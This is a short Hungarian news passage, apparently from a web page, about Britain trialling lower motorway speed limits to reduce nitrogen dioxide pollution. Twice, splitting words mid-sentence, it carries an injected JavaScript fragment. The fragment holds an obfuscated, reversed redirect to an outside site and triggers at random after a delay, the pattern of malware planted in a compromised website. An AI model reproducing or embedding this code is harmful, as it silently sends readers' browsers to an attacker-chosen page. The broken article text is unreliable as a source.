Az elmúlt két évtized során a brit autópályák forgalma negyedével növekedett és ez látható a nitrogén-dioxid szinten is. A levegő szennyezettsége pedig egészségügyi gondokat húz magával és többek közt ez ellen küzdenének azzal, hogy lejjebb szorítják az autópályákon megengedett maximális sebességet. Ameddig Németoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tországban akár korlátlan szakaszokon is lehet száguldani, Magyarországon pedig 130 km/óra a felső határ, addig Angliában 70 mérföld/óra, ami úgy 113 km/órának felel meg. Egyelőre teszt jelleggel helyeznének ki egyes szakaszokra 60 mérföld/órás (96 km/óra) táblákat. Hogy vizsgálható legyen a megengedett sebesség csökkentése, ezért több mint 1 éven keresztül maradna a korlátoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozás az M1, M5, M6 és M602…
- Hirdetés -